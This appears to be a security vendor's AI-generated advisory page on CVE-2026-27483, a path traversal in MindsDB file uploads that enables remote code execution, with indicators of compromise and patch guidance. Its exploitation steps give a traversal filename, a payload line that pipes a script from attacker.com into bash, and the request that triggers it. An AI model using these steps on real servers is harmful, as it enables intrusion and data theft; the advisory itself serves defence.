CVE-2026-27483: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-27483 is a path traversal vulnerability in MindsDB's /api/files HTTP interface that allows an authenticated attacker to write arbitrary files to any server path, leading to remote code execution (RCE). It affects all MindsDB versions prior to v25.9.1.1 (pip package mindsdb < 25.9.1.1). The vulnerability was discovered by the XlabAI Team of Tencent Xuanwu Lab using their Atuin Automated Vulnerability Discovery Engine, disclosed via GitHub Security Advisory on February 22, 2026, and published to the NVD on February 24, 2026. It carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, Feedly).

Technical details

The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — Path Traversal), located in mindsdb/api/http/namespaces/file.py. When a multipart file upload is submitted to the PUT /api/files/<name> endpoint, the python-multipart parser is configured with UPLOAD_KEEP_FILENAME: True and no sanitization of the filename field in the Content-Disposition header. The on_file callback directly assigns the raw decoded filename (including ../ sequences) to the upload path, and the file is written to disk before any clear_filename or save_file filtering is applied. An attacker can exploit this to overwrite arbitrary files — including Python package files such as /venv/lib/python3.10/site-packages/pip/__init__.py — and then trigger execution by calling the POST /api/handlers/<handler_name>/install endpoint, which invokes pip via subprocess.Popen (Github Advisory, Patch Commit).

Impact

Successful exploitation grants an authenticated attacker full remote code execution on the MindsDB server, with the privileges of the MindsDB process. An attacker can overwrite critical system or Python package files, inject and execute arbitrary OS commands, exfiltrate enterprise data processed by MindsDB, and potentially pivot to other internal systems accessible from the server. The impact is rated HIGH across confidentiality, integrity, and availability (Github Advisory).

Exploitability

A public proof-of-concept (PoC) exploit is available in the GitHub Security Advisory and has been independently published by researcher thewhiteh4t on GitHub (thewhiteh4t PoC). The exploit has also been indexed on Exploit-DB (EDB-52547) and Sploitus. A Nuclei detection template was submitted to the ProjectDiscovery nuclei-templates repository. The EPSS score is approximately 23.3% (96th percentile) according to the GitHub Advisory Database, indicating a high probability of exploitation within 30 days. There is no confirmed evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. No specific threat actor attribution has been made (Github Advisory, Recorded Future).

Exploitation steps

  1. Authenticate to MindsDB: Obtain valid credentials for a MindsDB instance (any authenticated user with access to the file upload UI or API is sufficient). Authenticate and capture the session cookie (e.g., bid=<session-id>).

  2. Craft the malicious multipart request: Construct a PUT /api/files/<name> HTTP request with Content-Type: multipart/form-data. In the file part's Content-Disposition header, set the filename to a path-traversal sequence targeting a writable Python package file, e.g.:

filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
  1. Inject malicious payload: Set the body of the file part to a Python script that executes an OS command, for example:
import os
os.system("curl http://attacker.com/shell.sh | bash")
  1. Send the upload request: Transmit the crafted multipart request to the target MindsDB server (default port 47334). Verify success by checking Docker/server logs for a line such as:
Opening file: b'/root/mdb_storage/tmp/mindsdb_file_xxx/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'
  1. Trigger RCE via handler install: Send a POST /api/handlers/<any_handler_name>/install request. MindsDB internally calls install_dependencies, which invokes pip via subprocess.Popen, executing the overwritten pip/__init__.py and running the attacker's payload.

  2. Achieve persistence or lateral movement: With RCE established, deploy a reverse shell, exfiltrate data, or install persistence mechanisms on the server (Github Advisory, thewhiteh4t PoC).

Indicators of compromise

  • Network: Unusual PUT requests to /api/files/<name> with multipart bodies containing ../ sequences in the filename field; unexpected outbound connections from the MindsDB server to external IPs (reverse shell callbacks).
  • Logs: MindsDB/Docker log entries containing python_multipart.multipart: Opening file: with path traversal sequences (e.g., ../../../../../../venv/...); POST requests to /api/handlers/<name>/install shortly after anomalous file uploads.
  • File System: Unexpected modification timestamps on Python package files such as /venv/lib/python3.10/site-packages/pip/__init__.py; presence of attacker-created files (e.g., /tmp/rce_by_hacker as used in the public PoC); new scripts or binaries in temp directories prefixed with mindsdb_file_.
  • Process: Unexpected child processes spawned by the MindsDB Python process (e.g., bash, curl, wget, python) following a handler install API call (Github Advisory).

Mitigation and workarounds

Patch: Upgrade MindsDB to version v25.9.1.1 or later, which validates that the uploaded filename contains no path traversal components (Path(file_name).name != file_name check) and sets UPLOAD_KEEP_FILENAME: False to prevent the library from using the attacker-supplied filename (Patch Commit, Release Notes).

Workarounds (if immediate patching is not possible):

  • Restrict network access to the MindsDB API (port 47334) to trusted hosts only using firewall rules.
  • Limit the /api/files endpoint to trusted, privileged users via network-level controls or a reverse proxy with authentication enforcement.
  • Monitor file system integrity on Python package directories (e.g., /venv/lib/) for unexpected modifications.

Community reactions

The vulnerability was discovered by the XlabAI Team of Tencent Xuanwu Lab using their Atuin automated vulnerability discovery engine, and credited in the official advisory. Recorded Future included CVE-2026-27483 in their March 2026 CVE landscape report as one of 31 high-impact vulnerabilities identified that month (Recorded Future). The Hacker Wire published a dedicated technical write-up on the path traversal to RCE chain (The Hacker Wire). Community activity included a Nuclei detection template submitted to ProjectDiscovery's nuclei-templates repository and a public PoC tool released by researcher thewhiteh4t.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management